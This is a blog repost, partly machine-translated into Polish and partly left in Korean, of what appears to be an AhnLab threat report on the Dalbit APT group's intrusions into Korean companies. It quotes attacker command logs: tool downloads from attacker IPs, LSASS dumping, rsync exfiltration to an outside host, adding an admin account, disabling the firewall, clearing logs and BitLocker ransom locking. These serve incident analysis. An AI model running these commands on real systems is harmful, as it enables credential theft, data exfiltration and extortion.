Kampania ataków APT chińskiej grupy hakerów

blaszczakm.blogspot.com 1 rok temu


AhnLab

Wysłane przez kingkimgim , 31 stycznia 2023 r

Dalbit (m00nlight): kampania ataków APT chińskiej grupy hakerów

0. Przegląd

Treść jest rozszerzeniem bloga „Attack Group using FRP (Fast Reverse Proxy) Targeting Domestic Companies”, który został opublikowany 16 sierpnia 2022 r. i śledzi działania grupy.


źródlo: https://asec.ahnlab.com/ko/46431/


Grupa atakująca przy użyciu FRP (Fast Reverse Proxy) na koreańskie firmy – ASEC BLOG

Spis treści1. Powłoka internetowa ASP. ASPXSpy2. Podniesienie uprawnień 2.1. Ziemniak2.2. Luka w zabezpieczeniach (exploit) 3. Proxy i przekierowanie portów 3.1. FRP3.2. HTran(LCX)4. Przypadki infekcji ransomware (BitLocker) W ostatnich latach krajowe firmy były często zaangażowane w naruszenia bezpieczeństwa, w których atakujący infiltruje, zaczynając od odsłonięcia podatnego serwera na zewnątrz i przejmuje kontrolę nad siecią wewnętrzną. Przypadki ataków wymierzonych w podatne serwery Atlassian Confluence Podatność Meterpretera na podatne serwery w krajowych placówkach medycznych…

Grupa ta korzystała głównie z narzędzi open source od przeszłości do chwili obecnej i brakowało jej wyraźnych cech profilowania ze względu na brak informacji, takich jak PDB. Ponadto serwer C2 (Command & Control) nadużył serwera krajowej firmy, a informacje, które można było zebrać, były ograniczone, gdyby ofiara nie zażądała osobnego dochodzenia. Jednak po opublikowaniu bloga i zablokowaniu niektórych krajowych serwerów korporacyjnych wykorzystywanych przez osobę atakującą osoba atakująca zaczęła wykorzystywać serwer hostingowy o nazwie „*.m00nlight.top” jako serwer C2 i serwer pobierania. Dlatego ASEC nazywa tę grupę Dalbit (m00nlight.top) od angielskiego słowa „Moonlight” oznaczającego „światło księżyca”.


Potwierdzono, iż grupa próbowała zaatakować ponad 50 koreańskich firm od 2022 roku do chwili obecnej. Firmy, które zostały dotychczas zaatakowane, to głównie małe i średnie firmy oraz niektóre duże firmy.W szczególności potwierdzono, iż 30% zainfekowanych firm korzysta z określonego rozwiązania systemu do pracy grupowej w Korei. w tej chwili trudno jednoznacznie stwierdzić, czy w oprogramowaniu do pracy grupowej występuje luka, ale jeżeli serwer wystawiony na zewnątrz jest podatny na ataki, może to doprowadzić do wycieku wewnętrznych tajemnic i systemu ransomware, co może mieć ogromny wpływ na firmę. Ponadto ta grupa Dalbit ustawia niektóre z zainfekowanych firm jako serwery proxy i serwery pobierania oraz jest wykorzystywana jako łącze atakującego podczas infiltracji innej firmy.


W związku z tym, jeżeli istnieje podejrzenie ataku grupy Dalbit, konieczne wydaje się przeprowadzenie wewnętrznej kontroli bezpieczeństwa, a w celu zapobieżenia potencjalnym szkodom wtórnym i innym szkodom korporacyjnym należy zgłosić się do AhnLab, aby mogła zareagować zapobiegawczo.



1. Krajowe firmy represjonowane (klasyfikacja branżowa)

W sumie 50 firm, które zostały zidentyfikowane jako ofiary od 2022 r. do chwili obecnej, są następujące. Firmy, których nie można jednoznacznie zidentyfikować, są wykluczone z listy i szacuje się, iż dotkniętych firm jest więcej.



[Rysunek 1] Branże firm zaatakowanych przez grupę Dalbit


Opis każdej klasyfikacji jest następujący.


Technologia: firma zajmująca się oprogramowaniem lub sprzętem

Przemysłowe: Producent maszyn, farb, stali i metalu

Chemia: kosmetyki, farmaceutyki, tworzywa sztuczne itp.

Budownictwo: Firmy budowlane lub stowarzyszenia lub organizacje związane z budownictwem

Motoryzacja : Producenci powiązani z motoryzacją

Półprzewodniki : Producenci powiązani z półprzewodnikami

Edukacja: firma edukacyjna

Hurt: hurtownik

Media: firmy drukarskie i medialne

Jedzenie: biznes spożywczy

Wysyłka: firma transportowa

Gościnność: firmy zajmujące się wypoczynkiem lub firmy zajmujące się kwaterami turystycznymi

Energia: Firmy energetyczne

Przemysł stoczniowy: Przemysł stoczniowy

Doradztwo : Firma zajmująca się doradztwem w zakresie zarządzania


2. Przepływ i charakterystyka

2.1. Podsumowanie


[Rysunek 2] Podsumowanie naruszenia przez Dalbit Group


Powyższy rysunek przedstawia proces, w którym osoba atakująca naraża Firmę B. Krótkie wprowadzenie do przepływu jest następujące.


1) Początkowy dostęp

Atakujący próbuje kontrolować system dzięki narzędzi, takich jak powłoka sieciowa, po uzyskaniu dostępu do systemu dzięki luk w zabezpieczeniach serwerów WWW lub serwerów SQL. 2) Pobierz kilka narzędzi hakerskich za pośrednictwem powłoki internetowej


Command & Control .

Narzędzia hakerskie obejmują kilka plików binarnych, w tym narzędzia do zwiększania uprawnień, narzędzia proxy i narzędzia do skanowania sieci.


3) Proxy & Internal Reconnaissance

Proxy: Atakujący instaluje narzędzie proxy, takie jak FRP (Fast Reverse Proxy), a następnie 2-1) serwer hostingowy zbudowany przez atakującego lub 2-2) serwer innej firmy (Firma A), która został zainfekowany Próbuje połączyć się z pulpitem zdalnym (RDP) przez

Rekonesans wewnętrzny: Rekonesans wewnętrzny i pozyskiwanie informacji dzięki narzędzi do skanowania sieci i narzędzi do przejmowania kont.


4) Ruch

poprzeczny Przenosi do innego serwera lub komputera, który można połączyć dzięki uzyskanych informacji. Następnie narzędzie proxy (FRP) jest instalowane na komputerze, na którym ruch boczny zdołał skonfigurować środowisko, w którym osoba atakująca może uzyskać dostęp do protokołu RDP, a niezbędne uprawnienia uzyskuje się, dodając określone konto lub używając narzędzia do kradzieży danych uwierzytelniających, takiego jak Mimikatz .


5) Wpływ

Wreszcie, jeżeli atakujący ukradł wszystkie potrzebne mu informacje, blokuje określony dysk dzięki funkcji BitLocker i żąda pieniędzy.

[Tabela 1] Podsumowanie opisu naruszenia


Główne cechy grupy Dalbit są następujące.


2.2. Cechy Dalbita

Lista opisane

Atakujący serwer C2 Pobieranie i serwer C2 (Command&Control):

Ponad połowa krajowych serwerów korporacyjnych lub serwerów hostingowych nadużywa krajowych serwerów korporacyjnych Serwery

hostingowe używają głównie *.m00nlight.top lub adresu IP.

Próba kontroli RDP Po infekcji próbuje głównie

uzyskać dostęp RDP Użyj narzędzia proxy lub Gotohttp do połączenia RDP

narzędzie proxy Oprócz FRP i LCX (Htran) główne narzędzia proxy używają NPS i ReGeorg .

Dodaj konto użytkownika Dodatkowe informacje o koncie dzięki polecenia net

( ID : 'main' / PW : 'ff0.123456' )

narzędzia open source Korzystanie z narzędzi typu open source, z których większość jest łatwo dostępna dla wszystkich,

zwłaszcza wiele narzędzi napisanych w języku chińskim.

uchylanie się Użyj produktów VMProtect, aby ominąć narzędzia hakerskie i diagnostykę Usuwanie

dziennika zdarzeń bezpieczeństwa

kradzież informacji Informacje o koncie użytkownika Informacje e-

mail

Przeciek ekranu Informacje o

zainstalowanym programie

[Tabela 2] Cechy Dalbita


3. Stosowane narzędzia i proces naruszenia

3.1. Narzędzia użytkowe i złośliwe oprogramowanie

powłoka internetowa program do pobierania podwyższenie uprawnień pełnomocnik rekonesans wewnętrzny

Godzilla

ASPXSpy

AntSword

China Chopper Certutil (Windows CMD)

Bitsadmin (Windows CMD) BadPotato

JuicyPotato

SweetPotato

RottenPotato

EFSPotato


CVE-2018-8639

CVE-2019-1458 FRP

LCX

NPS

ReGeorg FScan

NbtScan

TCPScan

Goon Nltest

(Windows CMD)

ruch boczny Zbieranie i wyciek informacji tylne drzwi szyfrowanie plików uchylanie się

RDP

PsExec

RemCom

Wineexec Wevtutil (Windows CMD)

WMI (Windows CMD)

ProcDump

Dumpert

EML Extractor (przez

Mimikatz


Rsync ) CobaltStrike

MetaSploit

BlueShell

Ladon BitLocker

(Windows CMD) Zabezpieczenia Usuwanie dziennika (Windows CMD)

Zapora wyłączona (Windows CMD)

Próba usunięcia produktu antywirusowego

VMProtect Packing

[Tabela 3] Złośliwe kody i narzędzia hakerskie wykorzystywane przez Dalbit

Jedno narzędzie stworzone przez atakującego wydaje się wyciekać wiadomości e-mail, a reszta korzystała z normalnych programów systemu Windows lub narzędzi, które można łatwo uzyskać podczas wyszukiwania.



3.2. proces o naruszenie

3.2.1. wczesna penetracja

Przypuszcza się, iż celem ataku jest serwer z określonym oprogramowaniem do pracy grupowej zainstalowanym w Korei, podatny na ataki serwer WWW, serwer pocztowy (Exchange Server) i serwer SQL. Atakujący wykorzystał luki w zabezpieczeniach WebLogic, takie jak CVE-2017-10271 lub luki w zabezpieczeniach przesyłania plików, aby przesłać WebShell, a niektóre wydają się używać wiersza polecenia programu SQL Server (xp_cmdshell).


Powłoki sieciowe wykorzystywane przez osoby atakujące to Godzilla, ASPXSpy, AntSword i China Chopper w kolejności. Godzilla była używana najczęściej, a także zidentyfikowano kilka innych powłok sieciowych.


Ścieżka zainstalowanej powłoki internetowej jest następująca.


– Rekrutacja personelu (luka umożliwiająca przesyłanie plików)

D:\WEB\********recruit\css\1.ashx

D:\WEB\********recruit\css\4.ashx

D: \WEB\********recruit\common\conf.aspx

.. .


– Luka w zabezpieczeniach związana z przesyłaniem plików

D:\UploadData\***********\****_File\Data\Award\1.ashx

D:\UploadData\*********** \****_File\Data\Award\2.aspx

D:\UploadData\************\****_File\Data\Award\3.aspx

D:\** Usługa sieci Web\*******\********Edytor\przykład\photo_uploader\File\conf.aspx

D:\**Usługa sieci Web\********_Submission\Include\file . aspx

.. .


– Określone oprogramowanie do pracy grupowej

D:\Web\(groupware)\cop\1.ashx

D:\Web\(groupware)\app\4.ashx

D:\Web\(groupware)\bbs\4.asmx

D:\Web\ (Oprogramowanie do pracy grupowej)\erp\tunnel.aspx (ReGeorg)

D:\inetpub\(Oprogramowanie do pracy grupowej)\image\2.asmx

D:\inetpub\(groupware)\image\2.aspx

C:\(groupware)\Web\(groupware)\cop\conf.aspx

C:\(groupware)\Web\(groupware)\cop\1.ashx

C:\(oprogramowanie do pracy grupowej)\Web\(oprogramowanie do pracy grupowej)\cop\1.asmx

C:\(oprogramowanie do pracy grupowej)\Web\(oprogramowanie do pracy grupowej)\cop\1.aspx


– Serwer pocztowy ( Exchange Server )

D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\aa.aspx

D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\ auth\11.aspx

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Tymczasowe pliki ASP.NET\root\91080f08\2694eff0\app_web_defaultwsdlhelpgenerator.aspx.cdcab7d2.sjx_41yb.dll

C:\Windows\Microsoft.NET\ Framework64\v4.0.30319\Tymczasowe pliki ASP.NET\root\91080f08\2694eff0\app_web_ldaj2kwn.dll


– Weblogic D:\***\wls1035\domains\************\servers\*******\tmp\************\uddiexplorer \gcx62x\war\modifyregistryhelp.jsp

D:\***\wls1035\domains\************\servers\*******\tmp\***** ******\wls-wsat\zfa3iv\war\eee.jsp

D:\***\wls1035\domains\************\servers\***** *\tmp\************\wls-wsat\zfa3iv\war\error.jsp

D:\Oracle\***********\user_projects\domains\** **********\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\123.jsp

D:\Oracle\*** *******\user_projects\domains\***************\servers\WLS_FORMS\tmp\************\wls-wsat \tcsxmg \war\test.jsp D:\Oracle\***********\user_projects\domains\*************\servers\WLS_FORMS\tmp\** **********\wls-wsat\tcsxmg\war\aaa.jsp


– Tomcat

C:\(Tomcat)\webapps\dd\sb.jsp

C:\(Tomcat)\webapps\ddd\index.jsp

C:\(Tomcat)\webapps\docs\update.jsp

C:\(Tomcat)\webapps\tmp\shell.jsp

[Tabela 4] Ścieżka, do której ładowana jest powłoka WWW


3.2.2. Pobierać

Atakujący pobiera inne narzędzia hakerskie dzięki domyślnie zainstalowanych normalnych programów systemu Windows. Ponieważ powłoka internetowa jest zwykle używana do infiltracji, z wyjątkiem procesów poleceń, takich jak cmd, procesy nadrzędne są wykonywane przez procesy serwera sieciowego, takie jak w3wp.exe, java.exe, sqlserver.exe i tomcat*.exe. Pobrane pliki otrzymują pliki potrzebne atakującemu, takie jak narzędzia do podnoszenia uprawnień, narzędzia proxy i narzędzia do skanowania sieci. Polecenie pobierania jest następujące.


(Dla porównania, w przypadku nadużywania krajowego serwera korporacyjnego adres nie jest w pełni ujawniany.)


1) Certutil


> certutil -urlcache -split -f hxxp://www.ive***.co[.]en/uploadfile/ufaceimage/1/update.zip c:\programdata\update.exe (frpc)

> certutil -urlcache - split -f hxxp://121.167.***[.]***/temp/8.txt c:\programdata\8.ini (frpc.ini)

> certutil -urlcache -split -f hxxp://103.118 .42[.]208:8080/frpc.exe frpc.exe

[Tabela 5] Dziennik pobierania Certutil

2) Bitsadmin


> bitsadmin /transfer mydownloadjob /download /priority normal “ hxxp://91.217.139[.]117:8080/calc32.exe ” “c:\windows\debug\winh32.exe” (frpc)

> bitsadmin /transfer mydownloadjob / download /priority normal „ hxxp://91.217.139[.]117:8001/log.ini ” „c:\windows\debug\log.ini” (frpc.ini)

[Tabela 6] Dziennik pobierania Bitsadmin

Narzędzia hakerskie i złośliwe kody pobierane przez osoby atakujące były identyfikowane głównie w następujących ścieżkach.


%ALLUSERSPROFIL%


%SystemDrive%\temp

%SystemDrive%\perflogs

%SystemDrive%\nia

%SystemDrive%\.tmp


%SystemRoot%

%SystemRoot%\debug

%SystemRoot%\temp

[Tabela 7] Główny katalog używany przez grupę Dalbit

Dlatego w przypadku podejrzenia naruszenia konieczne jest sprawdzenie pliku w odpowiedniej ścieżce.



3.2.3. Podnieś uprawnienia i dodaj konta

Atakujący używają głównie Potato (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato) i POC (CVE-2018-8639, CVE-2019-1458) opublikowanych na Github w celu eskalacji uprawnień. Charakteryzuje się dodaniem następującego konta po podniesieniu uprawnień.


Sp.exe poniżej to narzędzie SweetPotato.


> sp.exe „whaomi” (sprawdź uprawnienia)

> sp.exe „netsh advfirewall wyłącz stan wszystkich profili” (zapora wyłączona)

> sp.exe „użytkownik sieciGłównyff0.123456 /add & net localgroup administrators main /add” (dodaj konto)

[Tabela 8] Logi przy użyciu SweetPotato

Interesującą częścią do obejrzenia jest nazwa konta dodana przez atakującego. Potwierdza to również konto atakującego „główne” w innych firmach naruszających prawo.


Oprócz dodawania kont, atakujący wykorzystał również przejęte konta administratorów.


> wmic /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$ wywołanie procesu utwórz „cmd.exe /cc:\temp\s.bat”

[Tabela 9] Dziennik wykonania konta administratora


3.2.4. ustawienia proxy

Po infiltracji serwera atakujący uzyskuje do niego dostęp za pośrednictwem serwera proxy w celu wykorzystania komunikacji RDP. FRP i LCX były używane głównie jako narzędzia proxy, a ReGeorg , NPS lub RSOCKS zostały również potwierdzone w niektórych firmach. Ponadto kilka narzędzi proxy, takich jak FRP i LCX, zostało zidentyfikowanych w jednym miejscu w określonej firmie naruszającej prawa, a wiele plików konfiguracyjnych FRP (. Uważa się, iż gdy wśród dostępnych komputerów jest wiele ofiar, atakujący dodatkowo instaluje FRP i wykorzystuje dużą liczbę plików konfiguracyjnych. Ponadto używany przez grupę LCX ma te same funkcje, co open source, ale zamiast wersji opublikowanej na Githubie zastosowano arbitralnie skompilowane chińskie pliki binarne.


Istnieją różnice w metodach przekazywania i protokołach obsługiwanych przez narzędzia proxy, takie jak FRP i LCX. Ponieważ jednak raport TI „Raport z analizy przypadków ataków wykorzystujących różne narzędzia do zdalnego sterowania ” wyjaśnia różnicę, rzeczywiste przypadki infekcji oraz odtwarzane i sieciowe pakiety, ten artykuł nie wspomina o tej części osobno.



1) FRP (SZYBKIE ODWROTNE PROXY)

W przypadku przejęcia przez tę grupę pliki konfiguracyjne FRP (.ini) zostały zidentyfikowane zarówno na serwerze, jak i na urządzeniu PC. Poniżej znajduje się przykład rzeczywistej firmy naruszającej zasady.



[Rysunek 3] Plik konfiguracyjny FRPC (m00nlight.top) znaleziony w firmie naruszającej prawo

W szczególności grupa Dalbit komunikowała się głównie dzięki protokołu Socks5. Protokół Socks5 jest protokołem piątej warstwy 7. warstwy OSI i może obsługiwać różne żądania, takie jak HTTP, FTP i RDP, ponieważ znajduje się między 4. a 7. warstwą. W związku z tym, jeżeli atakujący użyje narzędzia połączenia proxy, takiego jak Proxifier, które może obsłużyć Socks5 na serwerze atakującego, możliwa jest zdalna kontrola przez RDP, a jeżeli możliwe jest połączenie z wewnętrznym komputerem PC, można również wykonać ruch boczny. Innymi słowy, jeżeli ustawisz plik konfiguracyjny na protokół Socks5, masz większą swobodę, ponieważ możesz obsłużyć wiele żądań bez dalszych modyfikacji.



[Rysunek 4] Przykład użycia Socks5


Poniżej znajdują się nazwy plików FRP i polecenia użyte przez atakującego. Poniżej wymieniono te najczęściej używane.


Nazwa pliku FRP

update.exe

debug.exe

main.exe

info.exe

Agent.exe

frpc.exe

test.exe

zabbix.exe

winh32.exe

cmd.exe

[Tabela 10] Nazwy plików FRP

Komenda FRP

> update.exe -c frpc.ini

> update.exe -c 8080.ini

> update.exe -c 8.ini

> info.zip -c frpc__8083.ini

> debug.exe -c debug.ini

> debug.exe - c debug.log

> debug.exe -c debug.txt

> frpc.exe -c frpc__2381.ini

> cmd.exe /cc:\temp\****\temp\frpc.ini

[Tabela 11] Dziennik wykonania FRP

Ponadto niektóre firmy zachowywały wytrwałość, rejestrując FRP w harmonogramie zadań (schtasks) pod nazwą „debug”. Potwierdzono, iż zarejestrowany harmonogram został wykonany w następujący sposób.


> schtasks /tn debug /run

[Tabela 12] Dziennik wykonywany przez Harmonogram zadań


2) LCX (HTRAN)

Dalbit użył pliku binarnego LCX (Htran) skompilowanego przez pewnego Chińczyka. Ma to taką samą funkcję jak istniejący plik binarny , ale określony jest pseudonim twórcy pliku binarnego.



[Rysunek 5] Uruchamianie LCX używane przez grupę Dalbit (autor: 折羽鸿鹄)

Osoba, która utworzyła plik binarny, jest identyfikowana jako „折羽鸿鹄” (QQ:56345566). Jest bardzo mało prawdopodobne, aby ten autor był atakującym, ale ponieważ tego pliku binarnego nie można pobrać po prostu przez wyszukiwanie, przypuszcza się, iż atakujący ma powiązania z Chinami.


Zainstalowana nazwa pliku i wykonanie są następujące.


Nazwa pliku LCX

lcx3.exe

lcx.exe

aktualizacja.exe

[Tabela 13] Nazwy plików LCX


Komenda LCX

> update.exe -slave 1.246.***.*** 110 127.0.0.1 3389

> lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389

[Tabela 14] Dziennik poleceń LCX

Powyższy LCX C2 to serwer firmy krajowej, dlatego oznaczony jest maskowaniem.



3.2.5. rekonesans wewnętrzny

Narzędzia Fscan i NBTScan były powszechnie używane do skanowania sieci, aw niektórych przypadkach zidentyfikowano TCP Scan i Goon.


Goon to narzędzie do skanowania sieci wykonane z Golang, które może skanować konta Tomcat, MSSQL i MYSQL, a także podstawowe skanowanie portów. Możesz również potwierdzić, iż narzędzie jest również wykonane w języku chińskim.



[Rysunek 6] Ekran podczas uruchamiania Goon


3.2.6. kradzież informacji

Głównymi informacjami kradnącymi są informacje LSASS Dump oraz plik EML konkretnego konta.W zależności od firmy potwierdzono, iż program zainstalowany dzięki polecenia WMIC jest sprawdzany lub obraz ekranu jest wysyłany na serwer osoby atakującej w regularnych odstępach czasu z komputera konkretnej ofiary.


1) WYODRĘBNIJ DANE UWIERZYTELNIAJĄCE (ZRZUT LSASS)

Osoba atakująca próbowała wyodrębnić informacje uwierzytelniające bez instalowania Mimikatz zgodnie z celem. Jest to metoda zrzutu procesu Lsass.exe.Ponieważ ten plik zrzutu zawiera informacje uwierzytelniające, narzędzia takie jak Mimikatz lub Pypykatz mogą uzyskać informacje uwierzytelniające komputera. Szczegółowe informacje na temat Mimikatz można znaleźć w raporcie TI „Raport z analizy technik propagacji w sieci wewnętrznej przy użyciu Mimikatz ”.


Metoda atakującego polegająca na kradzieży danych uwierzytelniających bez Mimikatz jest następująca.


1-1) Wywrotka


Open source Dumpert to narzędzie, które omija API hooking i działa zgodnie z wersją systemu operacyjnego, zrzuca proces lsass.exe dzięki API MiniDumpWriteDump(). Atakujący zmodyfikował kod, aby zmienić ścieżkę pliku zrzutu i usunąć funkcję wyjścia dziennika.



[Rysunek 7] Lewy (Dumpert open source) vs Prawy (Dumper używany przez grupę Dalbit)

Na powyższym obrazku w przypadku prawej strony widać, iż ścieżka i ciąg wyjściowy są takie same, poza tym, iż zostały usunięte.


Wszystkie dotychczas potwierdzone ścieżki plików zrzutu to „%SystemRoot%\temp” i są następujące.


%SystemRoot%\temp\duhgghmpert.dmp

%SystemRoot%\temp\dumpert.dmp

%SystemRoot%\temp\tarko.dmp

%SystemRoot%\temp\lsa.txt

[Tabela 15] Ścieżka pliku zrzutu Lsass


1-2) Procdump


Narzędzie Procdump to normalny program narzędziowy dostarczony przez firmę Microsoft, który zapewnia funkcję zrzutu procesu. Atakujący wykonał zrzut dzięki narzędzia w następujący sposób.



[Rysunek 8] Dane wyjściowe podczas wykonywania Procdump

Następnie atakujący wysłał plik zrzutu na serwer atakującego za pośrednictwem narzędzia o nazwie Rsync (Remote Sync). Poniżej znajduje się rzeczywisty przypadek atakującego próbującego ujawnić informacje.


> svchost.exe -accepteula -ma lsass.exe web_log.dmp

> rsync -avz –port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip

[Tabela 16] Wykonanie i logowanie Procdump przy użyciu rsync


2) EKSTRAKCJA POCZTY


[Rysunek 9] Uruchamianie narzędzia do wyodrębniania poczty


해당 샘플은 Golang으로 만들어진 메일 추출 도구로 현재 유일하게 공격자가 만든 도구로 추정되고 있다. 이는기업의 Exchange 메일 서버를 대상으로 EWS(Exchange Web Service)를 통해 특정 계정 메일을 EML파일로 추출하는 기능을 가지고 있다. 인자로는 Exchange 서버 주소와, 계정명, 해당 계정의 NTLM 패스워드 해시, 날짜 및 시간 등이 존재한다. 실행 시 해당 계정의 모든 메일함에서 인자로 받은 시간을 기준으로 모든 메일을 추출하여 EML 파일로 저장한다.


참고로 해당 바이너리의 PDB 정보는는 ‘fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff’로 무의미하다.



[그림 10] 메일 추출 도구의 PDF 정보


3) 화면 유출

공격자는 특정 PC의 화면을 공격자 서버로 송출하였다. 현재 화면을 캡쳐하는 바이너리가 확인되지 않았으나, 감염된 PC의 화면이 송출되는 공격자 서버가 확인되었다. 이는 5~10초 간격으로 특정 기업의 침해 PC의 화면이 송출되고 있었다.


공격자의 화면 송출 서버 : hxxp://91.217.139[.]117:8080/1.bat


[그림 11] 실제로 송출되었던 특정 기업의 피해 PC 화면


이는 온전히 이미지만 송출되었으며 원격으로 조종할 수 없고 오디오 등은 출력되지 않았다.


또한 화면이 송출되고 있던 공격자 서버(91.217.139[.]117)는 또 다른 기업에서 다운로드 서버로도 사용되고 있었다.


>certutil -urlcache -split -f hxxp://91.217.139[.]117:8080/calc32.exe

>certutil -split -urlcache -f hxxp://91.217.139[.]117:8443/log.ini c:\temp >bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc)

>bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini)

[표 17] 공격자 서버(91.217.139[.]117)의 다른 로그


4) 설치된 프로그램 조회 및 로그인 정보

공격자는 WMIC 명령어를 통해 설치된 프로그램을 확인하였다.


> wmic product get name,version

[표 18] 공격자가 설치된 프로그램을 조회한 방법


[그림 12] 설치된 프로그램 목록, 명령어 예시(WMIC)


또한 이벤트 로그 중 특정 이벤트 ID를 발생한 도메인 계정 정보에 대해 수집하였다. 생성된 파일은 c:\temp\EvtLogon.dat에 존재한다.


Event ID 의미

4624 로그인 성공

4768 커버로스 인증 요청

4776 NTLM 인증 시도

[표 19] 공격자가 사용한 이벤트 ID의 의미

> wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true >> c:\temp\EvtLogon.dat

[표 20] wevtutil 명령어 로그


3.2.7. 파일 암호화

해당 내용은 과거 블로그를 통해 자세히 소개되었다. 공격자는 윈도우 유틸리티인 BitLocker를 통해 특정 드라이브를 암호화하여 금액을 요구하였다. 현재 여러 피해 기업이 더 확인되고 있다.


BitLocker 명령어

> “C:\Windows\System32\BitLockerWizardElev.exe” F:\ T

> manage-bde -lock -ForceDismount F:

> manage-bde -lock -ForceDismount e:

> “c:\windows\system32\bitlockerwizardelev.exe” e:\ t

> “c:\windows\system32\bitlockerwizardelev.exe” f:\ u

[표 21] BitLocker 로그

아래는 공격자가 사용하는 랜섬노트이다. 공격자는 startmail.com, onionmail.com과 같은 익명 메일 서비스를 이용하였다.



[그림 13] 이전 블로그에 소개된 랜섬노트

랜섬노트 다운로드로 추정되는 명령어는 다음과 같다.


> certutil -urlcache -split -f hxxp://175.24.32[.]228:8888/readme c:\windows\temp\readme

[표 22] 랜섬노트 다운로드로 추정되는 로그


3.2.8. 우회

1) VMPROTECT PACKING

공격자는 바이너리를 업로드 후 진단이 되었을 때 VMProtect로 패킹을 하여 진단 우회를 시도하였다.


– 권한 상승 도구

%ALLUSERSPROFILE%\badpotatonet4.exe

%ALLUSERSPROFILE%\BadPotatoNet4.vmp.exe

%ALLUSERSPROFILE%\SweetPotato.exe

%ALLUSERSPROFILE%\SweetPotato.vmp.exe

%ALLUSERSPROFILE%\jc.vmp.exe

%SystemDrive%\nia\juicypotato.vmp1.exe

%SystemDrive%\nia\juicypotato.vmp.exe


– 프록시 도구

E:\WEB\*****\data\frpc.vmp.exe

%ALLUSERSPROFILE%\lcx.exe

%ALLUSERSPROFILE%\lcx_VP.exe

%SystemDrive%\Temp\lcx.exe

%SystemDrive%\Temp\lcx_VP.exe

%SystemDrive%\Temp\svchost.exe (FRP)

%SystemDrive%\Temp\frpc.vmp.exe

[표 23] VMP로 패킹된 파일


2) WEVTUTIL을 이용한 윈도우 이벤트 로그 삭제

Security 이벤트 로그 삭제

> cmd.exe /c wevtutil cl security


Application 로그 삭제

> cmd.exe wevtutil.exe el

> cmd.exe wevtutil.exe cl “application”

[표 24] 윈도우 이벤트 로그 삭제


3) 방화벽 OFF

sp.exe “netsh advfirewall set allprofiles state off”

[표 25] 방화벽 OFF


4. 결론

달빗(Dalbit) 해킹 그룹은 국내 기업의 취약한 서버를 대상으로 공격을 시도하였으며 이는 중견 이하 업체뿐만 아니라 일부 대기업에서도 로그가 올라오고 있다. 특히 피해 기업 중 30%가 국내의 특정 그룹웨어 제품을 사용 중인 것으로 확인되었다. 또 해당 그룹은 침입 초기에 사용한 웹쉘부터 최종 단계인 랜섬웨어까지 누구나 쉽게 구할 수 있는 도구를 사용하고 있으며 이 중, 중국 커뮤니티에서 구한 것으로 추정되는 프록시 도구나 중국어로 설명된 도구 그리고 이 글에서 언급되지 않은 중국어 도구도 존재한다. 따라서 공격자는 중국어로 소개되는 도구를 주로 사용한 것으로 보아 중국과 일부 연관이 있을 것으로 추정된다.


서버 관리자는 감염 의심 시 이 글에서 소개된 공격자의 주 다운로드 경로와 주 계정명(‘main’) 그리고 IOC 등을 확인해야 하며, 만약 의심 징후 확인 시 안랩에 즉시 신고하여 2차 피해를 줄여야 할 것으로 보인다. 또한 관리자는 서버 구성 환경이 취약할 경우 최신 버전으로 패치해 기존 취약점을 사전 방지하며 외부에 공개된 서버 중 관리되지 않는 서버가 있다면 필히 점검해야 할 것으로 보인다.



5. IOC

참고로 ASEC 블로그에서는 공격자가 악용 중인 국내 기업 서버의 IP를 공개하지 않는다.


Mitre Attack

Execution Persistence Privilege Escalation Credential Access Discovery Defense Evasion Lateral Movement Collection Exfiltration Command and Control Impact Resource Development

– Command and Scripting Interpreter(T1059)


– Windows Management Instrumentation(T1047)


– System Service(T1569) – Scheduled Task/Job(T1053)


– Create Account(T1136)


– Server Software Component(T1505)


– Account Manipulation(T1098) – Access Token Manipulation(T1134)


– Exploitation for Privilege Escalation(T1068) – OS Credential Dumping (T1003) – Remote System Discovery(T1018)


– Network Service Discovery(T1046) – Impair Defenses(T1562)


– Indicator Removal(T1070) – Remote Services(T1021)


– Lateral Tool Transfer(T1570) – Data from Local System(T1005)


– Account Discovery: Email Account(1087.003)


– Email Collection(T1114)


– Screen Capture(T1113) – Exfiltration Over Web Service(T1567) – Proxy(T1090)


– Ingress Tool Transfer(T1105) – Data Encrypted for Impact(T1486) – Stage Capabilities: Upload Malware(T1608.001)

[표 26] Mitre Attack

진단명

WebShell/Script.Generic (2020.12.11.09)

WebShell/ASP.ASpy.S1361 (2021.02.02.03)

WebShell/ASP.Generic.S1855 (2022.06.22.03)

WebShell/ASP.Small.S1378 (2021.02.24.02)

WebShell/JSP.Godzilla.S1719(2021.12.03.00)

WebShell/JSP.Chopper.SC183868(2022.10.15.01)

WebShell/JSP.Generic.S1363 (2021.01.27.03)

Backdoor/Script.Backdoor (2015.01.04.00)

WebShell/JSP.Generic.S1956 (2022.11.14.00)

Trojan/Script.Frpc (2022.12.17.00)

JS/Webshell (2011.08.08.03)

HackTool/Win.Fscan.C5334550(2023.01.27.00)

HackTool/Win.Fscan.C5230904(2022.10.08.00)

HackTool/Win.Fscan.R5229026(2022.10.07.03)

Trojan/JS.Agent(2022.03.16.02)

Unwanted/Win32.TCPScan.R33304(2012.08.17.00)

HackTool/Win.Scanner.C5220929(2022.08.09.02)

HackTool/Win.SweetPotato.R506105 (2022.08.04.01)

Exploit/Win.BadPotato.R508814 (2022.08.04.01)

HackTool/Win.JuicyPotato.R509932 (2022.08.09.03)

HackTool/Win.JuicyPotato.C2716248 (2022.08.09.00)

Exploit/Win.JuicyPotato.C425839(2022.08.04.01)

Exploit/Win.SweetPotato.C4093454 (2022.08.04.01)

Trojan/Win.Escalation.R524707(2022.10.04.02)

Trojan/Win.Generic.R457163(2021.12.09.01)

HackTool/Win64.Cve-2019-1458.R345589(2020.07.22.06)

